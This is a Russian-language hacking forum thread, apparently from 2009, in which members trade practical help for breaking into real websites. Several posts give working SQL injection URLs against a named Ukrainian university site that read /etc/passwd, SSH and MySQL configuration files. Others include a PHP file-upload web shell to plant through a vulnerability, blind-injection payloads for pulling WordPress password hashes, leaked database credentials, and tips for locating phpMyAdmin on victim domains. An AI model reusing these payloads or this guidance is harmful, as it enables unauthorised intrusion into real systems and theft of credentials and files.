Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Народ, ситуация такая:
    на вордпрессе 2.0.2 нашёл sql-injection:
    www.site.ru/?page_id=400&cat=-15+or+1=(select+1)/*
    В ответ на это:
    И версия 3-я:
    www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*

    Как тут можно получить пароль из wp_users?

    ---
    Вопрос снят. Ответ - Никак :)
     
    #9461 _gr34t, 24 Oct 2009
    Last edited: 25 Oct 2009
    1 person likes this.
  2. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    M1ks, если file_upload=On, то можно намного проще сделать.
    Заливаешь через свою уязвимость
    PHP:
    <?php if($_FILES[upfile]){if(!move_uploaded_file($_FILES[upfile][tmp_name], $_FILES[upfile][name]))die();}?><form method=POST enctype=<?php echo chr(39);?>multipart/form-data<?php echo chr(39);?>><input type=file name=upfile><input type=Submit></form>
    И заливаешь любой файл со своего компа
     
    #9462 _gr34t, 24 Oct 2009
    Last edited: 25 Oct 2009
    1 person likes this.
  3. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Strilo4ka, смотря какая ОС и как сервер настроен.
     
    1 person likes this.
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    3 мускул ,мда редкий зверь .
    без поддержки обьединения запросов посредством UNION ,+ при запросах типа SELECT,ни подзапросов
     
  5. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Code:
    http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+1,load_file(0x2f6574632f7068702e696e69),3,4,5--+
    используй load_file()
    Далее манимулируй для полного вывода данных.

    ВСЕ можна вывести через первый столбец:

    Code:
    http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7068702e696e69),2,3,4,5--+
     
    1 person likes this.
  6. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Хотелось бы услышать ответ на мой вопрос.
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Тут нет никакого вопроса. Ты не первый день на форуме. Статьи все в разделе СТАТЬИ, а слепые скули, конечно тебе никто собирать не будет. Поиск по теме SQL думаю поможет нарыть кучу примеров, в конце концов на локалке напиши скрипт и тренируйся, если интересно. И не обязательно искать слепые, можешь на любой пробовать, просто расскручивай её как будто вывода нет, вот и вся практика.
     
  8. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    Артем, если вопрос был про and/or, то:
    1. true'>if(locate(1,(substring((select+id+from+users+where+id=1),1,1))),0,1)
    2. false' union select * from table where locate(...)
    если про практику, то ответ в последней строчке постом выше
     
  9. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    может так легче?

    Code:
    ?php
    //$server = "80.73.1.156";
    $server = "localhost";
    $user = "univd";
    $pwd = "biohazard";
    //$server = "localhost:3306";
    //$user = "cardinal";
    //$pwd = "cfiekz";
    $con = mysql_connect($server, $user, $pwd);
    mysql_select_db("univd", $con);
    $maxbook = 10;
    ?>
     
    1 person likes this.
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    toolza, 7 пункт главного меню, 6 метод, только гет методом, но там ничего интересного нет:

    Code:
     /etc/ssh/sshd_config
    ------------------------------------
         http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7373682f737368645f636f6e666967),2,3,4,5--+
    ------------------------------------
      /etc/passwd
    ------------------------------------
         http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f706173737764),2,3,4,5--+
    ------------------------------------
      /etc/vsftpd.chroot_list
    ------------------------------------
         http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7673667470642e6368726f6f745f6c697374),2,3,4,5--+
    ------------------------------------
      /etc/my.cnf
    ------------------------------------
         http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f6d792e636e66),2,3,4,5--+
    ------------------------------------
      /etc/vsftpd.conf
    ------------------------------------
         http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7673667470642e636f6e66),2,3,4,5--+
    ------------------------------------
      /usr/bin/grep
    ------------------------------------
         http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f7573722f62696e2f67726570),2,3,4,5--+
    
    а вообще там менты, так что поаккуратней
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/thread148915.html
     
  12. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    прочитал : /home/snake/univd/univd/document/index.php

    Code:
    include ($path_pars . 'structure/tools_st.inc');
    Code:
    include ($path_pars .'serverdb.inc')
     
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://google.ru/

    site:домен_жертвы phpmyadmin

    Если админ норм, то ненайдёшь, посмотри у хостера.
     
  14. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Простенький сканер каталога phpMyAdmin
    Code:
    http://dumpz.org/13615/
    
     
    1 person likes this.
  15. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    + часто бывает пхп админ прячут на нулевом домене,тут только реверс айпи поможет(как повезет)
    Strilo4ka тут больше соображалка играет роль,и нормальный словарь директорий
    может поможет
    univd.edu.ua/dumper/dumper.php
     
    #9475 Shadrin, 25 Oct 2009
    Last edited: 25 Oct 2009
  16. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    Я пробую на локалке у себя, у меня всё пашет, а когда уже на удаленке, то ошибка выскакивает, хотя запрос тотже,
    #1064 - You have an error in your SQL syntax near '' at line 1


    Там походу офф, неработает чегото
     
  17. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Когда делаю ифрейм,на сайте появляется ошибка -Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homez.194/fromagero/www/includes/defines.php:3) in /homez.194/**/www/libraries/joomla/session/session.php on line 423
     
    #9477 2Fed123, 25 Oct 2009
    Last edited: 25 Oct 2009
  18. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    погоди с выводами.
    таблица "wp_users" имеет поле :
    user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
    колонку с паролем:
    Code:
    profile.php?id=2+and+length(user_pass)>0
    пароль:
    Code:
    id=2+and+ascii(substring(user_pass,1,1))>127
    ^Посимвольным перебором.
    вот замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.
     
    2 people like this.
  19. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Зри конфиг пхн, наверняка у тебя на локалке magic_quotes=off, а на удаленке - ON.
     
  20. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    млин, и че же делать..
     
Thread Status:
Not open for further replies.